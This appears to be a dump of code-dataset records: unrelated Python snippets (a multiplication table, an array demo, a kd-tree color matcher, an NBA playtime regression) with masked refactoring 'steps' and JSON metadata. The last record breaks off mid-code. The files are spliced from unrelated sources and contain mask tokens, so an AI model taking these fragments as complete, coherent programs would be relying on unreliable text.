"step-3": "<mask token>\n\n\nclass FixedData:\n\n def get_data(self, id):\n data = self.get_data_from_mongodb(id)\n if data:\n return data\n else:\n data = self.get_data_from_douban(id)\n self.upsert_data_into_mongo(data)\n",
"step-4": "from client import ClientHelper\nfrom mongodb import MongoDBClient\n\n\nclass FixedData:\n\n def get_data(self, id):\n data = self.get_data_from_mongodb(id)\n if data:\n return data\n else:\n data = self.get_data_from_douban(id)\n self.upsert_data_into_mongo(data)\n",
"step-5": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#\n# All about users.\n#\n# author: [email protected]\n#\n\nfrom client import ClientHelper\nfrom mongodb import MongoDBClient\n\nclass FixedData:\n\n def get_data( self, id ):\n data = self.get_data_from_mongodb( id )\n if ( data ):\n return data\n else:\n data = self.get_data_from_douban( id )\n self.upsert_data_into_mongo( data )\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
n = int(input('Informe um numero: '))
print('----------------')
print('{} x {:2} = {:2}'.format(n, 1, 1 * n))
print('{} x {:2} = {:2}'.format(n, 2, 2 * n))
print('{} x {:2} = {:2}'.format(n, 3, 3 * n))
print('{} x {:2} = {:2}'.format(n, 4, 4 * n))
print('{} x {:2} = {:2}'.format(n, 5, 5 * n))
print('{} x {:2} = {:2}'.format(n, 6, 6 * n))
print('{} x {:2} = {:2}'.format(n, 7, 7 * n))
print('{} x {:2} = {:2}'.format(n, 8, 8 * n))
print('{} x {:2} = {:2}'.format(n, 9, 9 * n))
print('{} x {:2} = {:2}'.format(n, 10, 10 * n))
print('----------------')
|
normal
|
{
"blob_id": "9e814e3f1162e248c5d778c2df9960b199854a27",
"index": 9306,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('----------------')\nprint('{} x {:2} = {:2}'.format(n, 1, 1 * n))\nprint('{} x {:2} = {:2}'.format(n, 2, 2 * n))\nprint('{} x {:2} = {:2}'.format(n, 3, 3 * n))\nprint('{} x {:2} = {:2}'.format(n, 4, 4 * n))\nprint('{} x {:2} = {:2}'.format(n, 5, 5 * n))\nprint('{} x {:2} = {:2}'.format(n, 6, 6 * n))\nprint('{} x {:2} = {:2}'.format(n, 7, 7 * n))\nprint('{} x {:2} = {:2}'.format(n, 8, 8 * n))\nprint('{} x {:2} = {:2}'.format(n, 9, 9 * n))\nprint('{} x {:2} = {:2}'.format(n, 10, 10 * n))\nprint('----------------')\n",
"step-3": "n = int(input('Informe um numero: '))\nprint('----------------')\nprint('{} x {:2} = {:2}'.format(n, 1, 1 * n))\nprint('{} x {:2} = {:2}'.format(n, 2, 2 * n))\nprint('{} x {:2} = {:2}'.format(n, 3, 3 * n))\nprint('{} x {:2} = {:2}'.format(n, 4, 4 * n))\nprint('{} x {:2} = {:2}'.format(n, 5, 5 * n))\nprint('{} x {:2} = {:2}'.format(n, 6, 6 * n))\nprint('{} x {:2} = {:2}'.format(n, 7, 7 * n))\nprint('{} x {:2} = {:2}'.format(n, 8, 8 * n))\nprint('{} x {:2} = {:2}'.format(n, 9, 9 * n))\nprint('{} x {:2} = {:2}'.format(n, 10, 10 * n))\nprint('----------------')\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
#Array In Python
from array import array
numbers = array("i",[1,2,3])
numbers[0] = 0
print(list(numbers))
|
normal
|
{
"blob_id": "ae5f87f1c383478ea5f370af1c85d63a472a7788",
"index": 455,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(list(numbers))\n",
"step-3": "<mask token>\nnumbers = array('i', [1, 2, 3])\nnumbers[0] = 0\nprint(list(numbers))\n",
"step-4": "from array import array\nnumbers = array('i', [1, 2, 3])\nnumbers[0] = 0\nprint(list(numbers))\n",
"step-5": "#Array In Python\n\nfrom array import array\n\nnumbers = array(\"i\",[1,2,3])\nnumbers[0] = 0\nprint(list(numbers))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from typing import Sequence, Union, Tuple
import kdtree
from colour import Color
AnsiCodeType = Union[str, int, Tuple[int, int, int]]
class ColorPoint(object):
def __init__(self, source: Color, target: Color,
ansi: AnsiCodeType) -> None:
"""
Map source color to target color, stores target
ansi color ans a single int, a sequence of RGB as ints
or markup string.
"""
self.source = source
self.target = target
self.ansi = ansi
def __len__(self) -> int:
"""
>>> cp = ColorPoint(Color('black'), Color('white'), '')
>>> len(cp) == 3
True
"""
return 3
def __getitem__(self, item) -> float:
"""
>>> cp = ColorPoint(Color('#880073'), Color('white'), '')
>>> cp[0] # hue
0.8590686274509803
>>> cp[1] # saturation
1.0
>>> cp[2] # luminance
0.26666666666666666
"""
return self.source.hsl[item]
def __repr__(self) -> str:
return 'ColorPoint({!r} => {!r})'.format(self.source, self.target)
class ColorMatch(object):
def __init__(self) -> None:
self.tree = kdtree.create(dimensions=3)
def add(self, source: Color, target: Color, ansi: AnsiCodeType) -> None:
point = ColorPoint(source, target, ansi)
self.tree.add(point)
def match(self, color: Color) -> ColorPoint:
"""
>>> cm = ColorMatch()
>>> cm.add(Color('red'), Color('white'), '')
>>> cm.add(Color('blue'), Color('white'), '')
>>> cm.match(Color('yellow'))
ColorPoint(<Color red> => <Color white>)
"""
results = self.tree.search_nn(color.hsl)
if not results:
raise KeyError('No match found for color: {}'.format(color))
return results[0].data
|
normal
|
{
"blob_id": "e239c2089fc6d4ab646c490b6e3de8953cec5634",
"index": 8093,
"step-1": "<mask token>\n\n\nclass ColorPoint(object):\n <mask token>\n <mask token>\n\n def __getitem__(self, item) ->float:\n \"\"\"\n >>> cp = ColorPoint(Color('#880073'), Color('white'), '')\n >>> cp[0] # hue\n 0.8590686274509803\n >>> cp[1] # saturation\n 1.0\n >>> cp[2] # luminance\n 0.26666666666666666\n \"\"\"\n return self.source.hsl[item]\n\n def __repr__(self) ->str:\n return 'ColorPoint({!r} => {!r})'.format(self.source, self.target)\n\n\nclass ColorMatch(object):\n\n def __init__(self) ->None:\n self.tree = kdtree.create(dimensions=3)\n\n def add(self, source: Color, target: Color, ansi: AnsiCodeType) ->None:\n point = ColorPoint(source, target, ansi)\n self.tree.add(point)\n\n def match(self, color: Color) ->ColorPoint:\n \"\"\"\n >>> cm = ColorMatch()\n >>> cm.add(Color('red'), Color('white'), '')\n >>> cm.add(Color('blue'), Color('white'), '')\n >>> cm.match(Color('yellow'))\n ColorPoint(<Color red> => <Color white>)\n \"\"\"\n results = self.tree.search_nn(color.hsl)\n if not results:\n raise KeyError('No match found for color: {}'.format(color))\n return results[0].data\n",
"step-2": "<mask token>\n\n\nclass ColorPoint(object):\n\n def __init__(self, source: Color, target: Color, ansi: AnsiCodeType\n ) ->None:\n \"\"\"\n Map source color to target color, stores target\n ansi color ans a single int, a sequence of RGB as ints\n or markup string.\n \"\"\"\n self.source = source\n self.target = target\n self.ansi = ansi\n <mask token>\n\n def __getitem__(self, item) ->float:\n \"\"\"\n >>> cp = ColorPoint(Color('#880073'), Color('white'), '')\n >>> cp[0] # hue\n 0.8590686274509803\n >>> cp[1] # saturation\n 1.0\n >>> cp[2] # luminance\n 0.26666666666666666\n \"\"\"\n return self.source.hsl[item]\n\n def __repr__(self) ->str:\n return 'ColorPoint({!r} => {!r})'.format(self.source, self.target)\n\n\nclass ColorMatch(object):\n\n def __init__(self) ->None:\n self.tree = kdtree.create(dimensions=3)\n\n def add(self, source: Color, target: Color, ansi: AnsiCodeType) ->None:\n point = ColorPoint(source, target, ansi)\n self.tree.add(point)\n\n def match(self, color: Color) ->ColorPoint:\n \"\"\"\n >>> cm = ColorMatch()\n >>> cm.add(Color('red'), Color('white'), '')\n >>> cm.add(Color('blue'), Color('white'), '')\n >>> cm.match(Color('yellow'))\n ColorPoint(<Color red> => <Color white>)\n \"\"\"\n results = self.tree.search_nn(color.hsl)\n if not results:\n raise KeyError('No match found for color: {}'.format(color))\n return results[0].data\n",
"step-3": "<mask token>\n\n\nclass ColorPoint(object):\n\n def __init__(self, source: Color, target: Color, ansi: AnsiCodeType\n ) ->None:\n \"\"\"\n Map source color to target color, stores target\n ansi color ans a single int, a sequence of RGB as ints\n or markup string.\n \"\"\"\n self.source = source\n self.target = target\n self.ansi = ansi\n\n def __len__(self) ->int:\n \"\"\"\n >>> cp = ColorPoint(Color('black'), Color('white'), '')\n >>> len(cp) == 3\n True\n \"\"\"\n return 3\n\n def __getitem__(self, item) ->float:\n \"\"\"\n >>> cp = ColorPoint(Color('#880073'), Color('white'), '')\n >>> cp[0] # hue\n 0.8590686274509803\n >>> cp[1] # saturation\n 1.0\n >>> cp[2] # luminance\n 0.26666666666666666\n \"\"\"\n return self.source.hsl[item]\n\n def __repr__(self) ->str:\n return 'ColorPoint({!r} => {!r})'.format(self.source, self.target)\n\n\nclass ColorMatch(object):\n\n def __init__(self) ->None:\n self.tree = kdtree.create(dimensions=3)\n\n def add(self, source: Color, target: Color, ansi: AnsiCodeType) ->None:\n point = ColorPoint(source, target, ansi)\n self.tree.add(point)\n\n def match(self, color: Color) ->ColorPoint:\n \"\"\"\n >>> cm = ColorMatch()\n >>> cm.add(Color('red'), Color('white'), '')\n >>> cm.add(Color('blue'), Color('white'), '')\n >>> cm.match(Color('yellow'))\n ColorPoint(<Color red> => <Color white>)\n \"\"\"\n results = self.tree.search_nn(color.hsl)\n if not results:\n raise KeyError('No match found for color: {}'.format(color))\n return results[0].data\n",
"step-4": "<mask token>\nAnsiCodeType = Union[str, int, Tuple[int, int, int]]\n\n\nclass ColorPoint(object):\n\n def __init__(self, source: Color, target: Color, ansi: AnsiCodeType\n ) ->None:\n \"\"\"\n Map source color to target color, stores target\n ansi color ans a single int, a sequence of RGB as ints\n or markup string.\n \"\"\"\n self.source = source\n self.target = target\n self.ansi = ansi\n\n def __len__(self) ->int:\n \"\"\"\n >>> cp = ColorPoint(Color('black'), Color('white'), '')\n >>> len(cp) == 3\n True\n \"\"\"\n return 3\n\n def __getitem__(self, item) ->float:\n \"\"\"\n >>> cp = ColorPoint(Color('#880073'), Color('white'), '')\n >>> cp[0] # hue\n 0.8590686274509803\n >>> cp[1] # saturation\n 1.0\n >>> cp[2] # luminance\n 0.26666666666666666\n \"\"\"\n return self.source.hsl[item]\n\n def __repr__(self) ->str:\n return 'ColorPoint({!r} => {!r})'.format(self.source, self.target)\n\n\nclass ColorMatch(object):\n\n def __init__(self) ->None:\n self.tree = kdtree.create(dimensions=3)\n\n def add(self, source: Color, target: Color, ansi: AnsiCodeType) ->None:\n point = ColorPoint(source, target, ansi)\n self.tree.add(point)\n\n def match(self, color: Color) ->ColorPoint:\n \"\"\"\n >>> cm = ColorMatch()\n >>> cm.add(Color('red'), Color('white'), '')\n >>> cm.add(Color('blue'), Color('white'), '')\n >>> cm.match(Color('yellow'))\n ColorPoint(<Color red> => <Color white>)\n \"\"\"\n results = self.tree.search_nn(color.hsl)\n if not results:\n raise KeyError('No match found for color: {}'.format(color))\n return results[0].data\n",
"step-5": "from typing import Sequence, Union, Tuple\n\nimport kdtree\n\nfrom colour import Color\n\nAnsiCodeType = Union[str, int, Tuple[int, int, int]]\n\n\nclass ColorPoint(object):\n def __init__(self, source: Color, target: Color,\n ansi: AnsiCodeType) -> None:\n \"\"\"\n Map source color to target color, stores target\n ansi color ans a single int, a sequence of RGB as ints\n or markup string.\n \"\"\"\n self.source = source\n self.target = target\n self.ansi = ansi\n\n def __len__(self) -> int:\n \"\"\"\n >>> cp = ColorPoint(Color('black'), Color('white'), '')\n >>> len(cp) == 3\n True\n \"\"\"\n return 3\n\n def __getitem__(self, item) -> float:\n \"\"\"\n >>> cp = ColorPoint(Color('#880073'), Color('white'), '')\n >>> cp[0] # hue\n 0.8590686274509803\n >>> cp[1] # saturation\n 1.0\n >>> cp[2] # luminance\n 0.26666666666666666\n \"\"\"\n return self.source.hsl[item]\n\n def __repr__(self) -> str:\n return 'ColorPoint({!r} => {!r})'.format(self.source, self.target)\n\n\nclass ColorMatch(object):\n def __init__(self) -> None:\n self.tree = kdtree.create(dimensions=3)\n\n def add(self, source: Color, target: Color, ansi: AnsiCodeType) -> None:\n point = ColorPoint(source, target, ansi)\n self.tree.add(point)\n\n def match(self, color: Color) -> ColorPoint:\n \"\"\"\n >>> cm = ColorMatch()\n >>> cm.add(Color('red'), Color('white'), '')\n >>> cm.add(Color('blue'), Color('white'), '')\n >>> cm.match(Color('yellow'))\n ColorPoint(<Color red> => <Color white>)\n \"\"\"\n results = self.tree.search_nn(color.hsl)\n if not results:\n raise KeyError('No match found for color: {}'.format(color))\n return results[0].data\n\n\n",
"step-ids": [
7,
8,
9,
10,
12
]
}
|
[
7,
8,
9,
10,
12
] |
import sys
import numpy as np
from pymongo import MongoClient
from sklearn import linear_model, preprocessing
assert str(sys.argv[1]) is not None
client = MongoClient(str(sys.argv[1]))
db = client.nba_py
variables = ['0', '1', '2', '3', '4',
'5', '6', '7', '8', '9',
'10', '11', '12', '13', '14',
'15', '16', '17', '18', '19', ]
ITERATIONS = 5
MINUTE_RESTRICTION = 15
ALPHA_VALS = [0, 0.02, 0.03, 0.04, 0.05, 0.06, 0.07, 0.08, 1]
best_error = 999
best_k = 0
for k in ALPHA_VALS:
total_train_error = 0
total_train_variance = 0
total_test_error = 0
total_test_variance = 0
dumb_total_train_error = 0
dumb_total_train_variance = 0
dumb_total_test_error = 0
dumb_total_test_variance = 0
baseline_error = 0
total_count = 0
for j in range(ITERATIONS):
for i in range(len(variables)):
allData = []
allDumbData = []
cursor = db.playtime_model.find({"PLAYER_GROUP": i, "AVG_MIN": {"$gt": MINUTE_RESTRICTION}})
count = 0
for document in cursor:
dataRow = []
for variable in variables:
dataRow.append(document[variable])
dataRow.append(document['AVG_MIN'])
dataRow.append((document['WIN_CHANCE'])**2)
dataRow.append(document['MIN'])
allData.append(dataRow)
allDumbData.append([document['AVG_MIN'], document['MIN']])
count = count + 1
print("player group: %d, game count: %d" % (i, count))
if (count > 600):
total_count += count
Xy = np.array(allData)
np.random.shuffle(Xy)
X = Xy[ :, range(0, Xy.shape[1]-1) ]
y = Xy[ :, Xy.shape[1]-1 ]
X_normalized = preprocessing.scale(X)
# Separate into Train and Test datasets
train_test_split = int(round(len(y) * 0.7))
X_normalized_train = X_normalized[:train_test_split]
X_normalized_test = X_normalized[train_test_split:]
y_train = y[:train_test_split]
y_test = y[train_test_split:]
# train model
if k == 0:
regr = linear_model.LinearRegression(fit_intercept=True)
else:
regr = linear_model.Lasso(alpha=k, fit_intercept=True)
regr.fit(X_normalized_train, y_train)
# Coefficients
# print('Intercept: ', regr.intercept_) ------------------------------------
# for i in range(regr.coef_.size): -----------------------------------------
# print (variables[i], regr.coef_[i]) ----------------------------------
# print("================") ------------------------------------------------
# Error Analysis
train_error = np.mean((regr.predict(X_normalized_train) - y_train) ** 2)
train_variance = regr.score(X_normalized_train, y_train)
test_error = np.mean((regr.predict(X_normalized_test) - y_test) ** 2)
test_variance = regr.score(X_normalized_test, y_test)
# print("Residual sum of squares for training set: %.2f" % train_error) ----
# print('Variance score: %.2f' % train_variance) ---------------------------
# print("Residual sum of squares for test set: %.2f" % test_error) -
# print('Variance score: %.2f' % test_variance) --------------------
total_train_error += train_error * count
total_train_variance += train_variance * count
total_test_error += test_error * count
total_test_variance += test_variance * count
#~~~~calculate against baseline~~~~~~~~~~~
# Xy = np.array(allDumbData) -----------------------------------
# np.random.shuffle(Xy) ----------------------------------------
# X = Xy[ :, range(0, Xy.shape[1]-1) ] -------------------------
# y = Xy[ :, Xy.shape[1]-1 ] -----------------------------------
# -----------------------------------------------------------------------------
# X_normalized = (X) -------------------------------------------
# -----------------------------------------------------------------------------
# # Separate into Train and Test datasets ----------------------
# train_test_split = int(round(len(y) * 0.7)) ------------------
# X_normalized_train = X_normalized[:train_test_split] ---------
# X_normalized_test = X_normalized[train_test_split:] ----------
# y_train = y[:train_test_split] -------------------------------
# y_test = y[train_test_split:] --------------------------------
# -----------------------------------------------------------------------------
# regr = linear_model.LinearRegression(fit_intercept=True) -----
# regr.fit(X_normalized_train, y_train) ------------------------
# -----------------------------------------------------------------------------
# # Error Analysis ---------------------------------------------
# train_error = np.mean((regr.predict(X_normalized_train) - y_train) ** 2)
# train_variance = regr.score(X_normalized_train, y_train) -----
# test_error = np.mean((regr.predict(X_normalized_test) - y_test) ** 2)
# test_variance = regr.score(X_normalized_test, y_test) --------
# # print("Residual sum of squares for training set: %.2f" % train_error) ----
# # print('Variance score: %.2f' % train_variance) ---------------------------
# # print("Residual sum of squares for dumb test set: %.2f" % test_error)
# # print('Variance score for dumb test set: %.2f' % test_variance) --
# dumb_total_train_error += train_error * count ----------------
# dumb_total_train_variance += train_variance * count ----------
# dumb_total_test_error += test_error * count ------------------
# dumb_total_test_variance += test_variance * count ------------
total_train_error = total_train_error / total_count
total_train_variance = total_train_variance / total_count
total_test_error = total_test_error / total_count
total_test_variance = total_test_variance / total_count
# dumb_total_train_error = dumb_total_train_error / total_count ------------
# dumb_total_train_variance = dumb_total_train_variance / total_count ------
# dumb_total_test_error = dumb_total_test_error / total_count --------------
# dumb_total_test_variance = dumb_total_test_variance / total_count --------
print("alpha-value: %.2f" % k)
print("total_train_error: %.2f" % total_train_error)
print("total_train_variance: %.2f" % total_train_variance)
print("total_test_error: %.2f" % total_test_error)
print("total_test_variance: %.2f" % total_test_variance)
# print("dumb_total_train_error: %.2f" % dumb_total_train_error) -----------
# print("dumb_total_train_variance: %.2f" % dumb_total_train_variance) -----
# print("dumb_total_test_error: %.2f" % dumb_total_test_error) -------------
# print("dumb_total_test_variance: %.2f" % dumb_total_test_variance) -------
# print("total_count: %d" % (total_count / ITERATIONS)) --------------------
if (total_test_error < best_error):
best_error = total_test_error
best_k = k
# Calculate against baseline ---------------------------------------------------
cursor = db.playtime_model.find({"AVG_MIN": {"$gt": MINUTE_RESTRICTION}})
baseline_error = 0.0
count = 0
for document in cursor:
baseline_error += (document['AVG_MIN'] - document['MIN'])**2
count += 1
baseline_error = baseline_error / count
print("baseline error: %.2f" % baseline_error)
print("best error: %.2f, best alpha: %.2f" % (best_error, best_k))
|
normal
|
{
"blob_id": "36682c4ab90cdd22b644906e22ede71254eb42ff",
"index": 2091,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nassert str(sys.argv[1]) is not None\n<mask token>\nfor k in ALPHA_VALS:\n total_train_error = 0\n total_train_variance = 0\n total_test_error = 0\n total_test_variance = 0\n dumb_total_train_error = 0\n dumb_total_train_variance = 0\n dumb_total_test_error = 0\n dumb_total_test_variance = 0\n baseline_error = 0\n total_count = 0\n for j in range(ITERATIONS):\n for i in range(len(variables)):\n allData = []\n allDumbData = []\n cursor = db.playtime_model.find({'PLAYER_GROUP': i, 'AVG_MIN':\n {'$gt': MINUTE_RESTRICTION}})\n count = 0\n for document in cursor:\n dataRow = []\n for variable in variables:\n dataRow.append(document[variable])\n dataRow.append(document['AVG_MIN'])\n dataRow.append(document['WIN_CHANCE'] ** 2)\n dataRow.append(document['MIN'])\n allData.append(dataRow)\n allDumbData.append([document['AVG_MIN'], document['MIN']])\n count = count + 1\n print('player group: %d, game count: %d' % (i, count))\n if count > 600:\n total_count += count\n Xy = np.array(allData)\n np.random.shuffle(Xy)\n X = Xy[:, range(0, Xy.shape[1] - 1)]\n y = Xy[:, Xy.shape[1] - 1]\n X_normalized = preprocessing.scale(X)\n train_test_split = int(round(len(y) * 0.7))\n X_normalized_train = X_normalized[:train_test_split]\n X_normalized_test = X_normalized[train_test_split:]\n y_train = y[:train_test_split]\n y_test = y[train_test_split:]\n if k == 0:\n regr = linear_model.LinearRegression(fit_intercept=True)\n else:\n regr = linear_model.Lasso(alpha=k, fit_intercept=True)\n regr.fit(X_normalized_train, y_train)\n train_error = np.mean((regr.predict(X_normalized_train) -\n y_train) ** 2)\n train_variance = regr.score(X_normalized_train, y_train)\n test_error = np.mean((regr.predict(X_normalized_test) -\n y_test) ** 2)\n test_variance = regr.score(X_normalized_test, y_test)\n total_train_error += train_error * count\n total_train_variance += train_variance * count\n total_test_error += test_error * count\n total_test_variance += test_variance * count\n total_train_error = total_train_error / total_count\n total_train_variance = total_train_variance / total_count\n total_test_error = total_test_error / total_count\n total_test_variance = total_test_variance / total_count\n print('alpha-value: %.2f' % k)\n print('total_train_error: %.2f' % total_train_error)\n print('total_train_variance: %.2f' % total_train_variance)\n print('total_test_error: %.2f' % total_test_error)\n print('total_test_variance: %.2f' % total_test_variance)\n if total_test_error < best_error:\n best_error = total_test_error\n best_k = k\n<mask token>\nfor document in cursor:\n baseline_error += (document['AVG_MIN'] - document['MIN']) ** 2\n count += 1\n<mask token>\nprint('baseline error: %.2f' % baseline_error)\nprint('best error: %.2f, best alpha: %.2f' % (best_error, best_k))\n",
"step-3": "<mask token>\nassert str(sys.argv[1]) is not None\nclient = MongoClient(str(sys.argv[1]))\ndb = client.nba_py\nvariables = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11',\n '12', '13', '14', '15', '16', '17', '18', '19']\nITERATIONS = 5\nMINUTE_RESTRICTION = 15\nALPHA_VALS = [0, 0.02, 0.03, 0.04, 0.05, 0.06, 0.07, 0.08, 1]\nbest_error = 999\nbest_k = 0\nfor k in ALPHA_VALS:\n total_train_error = 0\n total_train_variance = 0\n total_test_error = 0\n total_test_variance = 0\n dumb_total_train_error = 0\n dumb_total_train_variance = 0\n dumb_total_test_error = 0\n dumb_total_test_variance = 0\n baseline_error = 0\n total_count = 0\n for j in range(ITERATIONS):\n for i in range(len(variables)):\n allData = []\n allDumbData = []\n cursor = db.playtime_model.find({'PLAYER_GROUP': i, 'AVG_MIN':\n {'$gt': MINUTE_RESTRICTION}})\n count = 0\n for document in cursor:\n dataRow = []\n for variable in variables:\n dataRow.append(document[variable])\n dataRow.append(document['AVG_MIN'])\n dataRow.append(document['WIN_CHANCE'] ** 2)\n dataRow.append(document['MIN'])\n allData.append(dataRow)\n allDumbData.append([document['AVG_MIN'], document['MIN']])\n count = count + 1\n print('player group: %d, game count: %d' % (i, count))\n if count > 600:\n total_count += count\n Xy = np.array(allData)\n np.random.shuffle(Xy)\n X = Xy[:, range(0, Xy.shape[1] - 1)]\n y = Xy[:, Xy.shape[1] - 1]\n X_normalized = preprocessing.scale(X)\n train_test_split = int(round(len(y) * 0.7))\n X_normalized_train = X_normalized[:train_test_split]\n X_normalized_test = X_normalized[train_test_split:]\n y_train = y[:train_test_split]\n y_test = y[train_test_split:]\n if k == 0:\n regr = linear_model.LinearRegression(fit_intercept=True)\n else:\n regr = linear_model.Lasso(alpha=k, fit_intercept=True)\n regr.fit(X_normalized_train, y_train)\n train_error = np.mean((regr.predict(X_normalized_train) -\n y_train) ** 2)\n train_variance = regr.score(X_normalized_train, y_train)\n test_error = np.mean((regr.predict(X_normalized_test) -\n y_test) ** 2)\n test_variance = regr.score(X_normalized_test, y_test)\n total_train_error += train_error * count\n total_train_variance += train_variance * count\n total_test_error += test_error * count\n total_test_variance += test_variance * count\n total_train_error = total_train_error / total_count\n total_train_variance = total_train_variance / total_count\n total_test_error = total_test_error / total_count\n total_test_variance = total_test_variance / total_count\n print('alpha-value: %.2f' % k)\n print('total_train_error: %.2f' % total_train_error)\n print('total_train_variance: %.2f' % total_train_variance)\n print('total_test_error: %.2f' % total_test_error)\n print('total_test_variance: %.2f' % total_test_variance)\n if total_test_error < best_error:\n best_error = total_test_error\n best_k = k\ncursor = db.playtime_model.find({'AVG_MIN': {'$gt': MINUTE_RESTRICTION}})\nbaseline_error = 0.0\ncount = 0\nfor document in cursor:\n baseline_error += (document['AVG_MIN'] - document['MIN']) ** 2\n count += 1\nbaseline_error = baseline_error / count\nprint('baseline error: %.2f' % baseline_error)\nprint('best error: %.2f, best alpha: %.2f' % (best_error, best_k))\n",
"step-4": "import sys\nimport numpy as np\nfrom pymongo import MongoClient\nfrom sklearn import linear_model, preprocessing\nassert str(sys.argv[1]) is not None\nclient = MongoClient(str(sys.argv[1]))\ndb = client.nba_py\nvariables = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11',\n '12', '13', '14', '15', '16', '17', '18', '19']\nITERATIONS = 5\nMINUTE_RESTRICTION = 15\nALPHA_VALS = [0, 0.02, 0.03, 0.04, 0.05, 0.06, 0.07, 0.08, 1]\nbest_error = 999\nbest_k = 0\nfor k in ALPHA_VALS:\n total_train_error = 0\n total_train_variance = 0\n total_test_error = 0\n total_test_variance = 0\n dumb_total_train_error = 0\n dumb_total_train_variance = 0\n dumb_total_test_error = 0\n dumb_total_test_variance = 0\n baseline_error = 0\n total_count = 0\n for j in range(ITERATIONS):\n for i in range(len(variables)):\n allData = []\n allDumbData = []\n cursor = db.playtime_model.find({'PLAYER_GROUP': i, 'AVG_MIN':\n {'$gt': MINUTE_RESTRICTION}})\n count = 0\n for document in cursor:\n dataRow = []\n for variable in variables:\n dataRow.append(document[variable])\n dataRow.append(document['AVG_MIN'])\n dataRow.append(document['WIN_CHANCE'] ** 2)\n dataRow.append(document['MIN'])\n allData.append(dataRow)\n allDumbData.append([document['AVG_MIN'], document['MIN']])\n count = count + 1\n print('player group: %d, game count: %d' % (i, count))\n if count > 600:\n total_count += count\n Xy = np.array(allData)\n np.random.shuffle(Xy)\n X = Xy[:, range(0, Xy.shape[1] - 1)]\n y = Xy[:, Xy.shape[1] - 1]\n X_normalized = preprocessing.scale(X)\n train_test_split = int(round(len(y) * 0.7))\n X_normalized_train = X_normalized[:train_test_split]\n X_normalized_test = X_normalized[train_test_split:]\n y_train = y[:train_test_split]\n y_test = y[train_test_split:]\n if k == 0:\n regr = linear_model.LinearRegression(fit_intercept=True)\n else:\n regr = linear_model.Lasso(alpha=k, fit_intercept=True)\n regr.fit(X_normalized_train, y_train)\n train_error = np.mean((regr.predict(X_normalized_train) -\n y_train) ** 2)\n train_variance = regr.score(X_normalized_train, y_train)\n test_error = np.mean((regr.predict(X_normalized_test) -\n y_test) ** 2)\n test_variance = regr.score(X_normalized_test, y_test)\n total_train_error += train_error * count\n total_train_variance += train_variance * count\n total_test_error += test_error * count\n total_test_variance += test_variance * count\n total_train_error = total_train_error / total_count\n total_train_variance = total_train_variance / total_count\n total_test_error = total_test_error / total_count\n total_test_variance = total_test_variance / total_count\n print('alpha-value: %.2f' % k)\n print('total_train_error: %.2f' % total_train_error)\n print('total_train_variance: %.2f' % total_train_variance)\n print('total_test_error: %.2f' % total_test_error)\n print('total_test_variance: %.2f' % total_test_variance)\n if total_test_error < best_error:\n best_error = total_test_error\n best_k = k\ncursor = db.playtime_model.find({'AVG_MIN': {'$gt': MINUTE_RESTRICTION}})\nbaseline_error = 0.0\ncount = 0\nfor document in cursor:\n baseline_error += (document['AVG_MIN'] - document['MIN']) ** 2\n count += 1\nbaseline_error = baseline_error / count\nprint('baseline error: %.2f' % baseline_error)\nprint('best error: %.2f, best alpha: %.2f' % (best_error, best_k))\n",
"step-5": "import sys\nimport numpy as np\nfrom pymongo import MongoClient\nfrom sklearn import linear_model, preprocessing\n\nassert str(sys.argv[1]) is not None\nclient = MongoClient(str(sys.argv[1]))\ndb = client.nba_py\n\nvariables = ['0', '1', '2', '3', '4', \n '5', '6', '7', '8', '9', \n '10', '11', '12', '13', '14', \n '15', '16', '17', '18', '19', ]\n\nITERATIONS = 5\nMINUTE_RESTRICTION = 15\nALPHA_VALS = [0, 0.02, 0.03, 0.04, 0.05, 0.06, 0.07, 0.08, 1]\n\nbest_error = 999\nbest_k = 0\n\nfor k in ALPHA_VALS: \n total_train_error = 0\n total_train_variance = 0\n total_test_error = 0\n total_test_variance = 0\n dumb_total_train_error = 0\n dumb_total_train_variance = 0\n dumb_total_test_error = 0\n dumb_total_test_variance = 0\n baseline_error = 0\n total_count = 0\n for j in range(ITERATIONS):\n for i in range(len(variables)):\n \n allData = []\n allDumbData = []\n \n cursor = db.playtime_model.find({\"PLAYER_GROUP\": i, \"AVG_MIN\": {\"$gt\": MINUTE_RESTRICTION}})\n \n count = 0\n for document in cursor:\n dataRow = []\n for variable in variables:\n dataRow.append(document[variable])\n dataRow.append(document['AVG_MIN'])\n dataRow.append((document['WIN_CHANCE'])**2)\n dataRow.append(document['MIN'])\n allData.append(dataRow)\n allDumbData.append([document['AVG_MIN'], document['MIN']])\n count = count + 1\n \n print(\"player group: %d, game count: %d\" % (i, count))\n if (count > 600):\n total_count += count\n \n Xy = np.array(allData)\n np.random.shuffle(Xy)\n X = Xy[ :, range(0, Xy.shape[1]-1) ]\n y = Xy[ :, Xy.shape[1]-1 ]\n \n X_normalized = preprocessing.scale(X)\n \n # Separate into Train and Test datasets\n train_test_split = int(round(len(y) * 0.7))\n X_normalized_train = X_normalized[:train_test_split]\n X_normalized_test = X_normalized[train_test_split:]\n y_train = y[:train_test_split]\n y_test = y[train_test_split:]\n \n # train model\n if k == 0: \n regr = linear_model.LinearRegression(fit_intercept=True)\n else: \n regr = linear_model.Lasso(alpha=k, fit_intercept=True)\n regr.fit(X_normalized_train, y_train)\n \n # Coefficients\n # print('Intercept: ', regr.intercept_) ------------------------------------\n # for i in range(regr.coef_.size): -----------------------------------------\n # print (variables[i], regr.coef_[i]) ----------------------------------\n # print(\"================\") ------------------------------------------------\n # Error Analysis\n train_error = np.mean((regr.predict(X_normalized_train) - y_train) ** 2)\n train_variance = regr.score(X_normalized_train, y_train)\n test_error = np.mean((regr.predict(X_normalized_test) - y_test) ** 2)\n test_variance = regr.score(X_normalized_test, y_test)\n # print(\"Residual sum of squares for training set: %.2f\" % train_error) ----\n # print('Variance score: %.2f' % train_variance) ---------------------------\n # print(\"Residual sum of squares for test set: %.2f\" % test_error) -\n # print('Variance score: %.2f' % test_variance) --------------------\n total_train_error += train_error * count\n total_train_variance += train_variance * count\n total_test_error += test_error * count\n 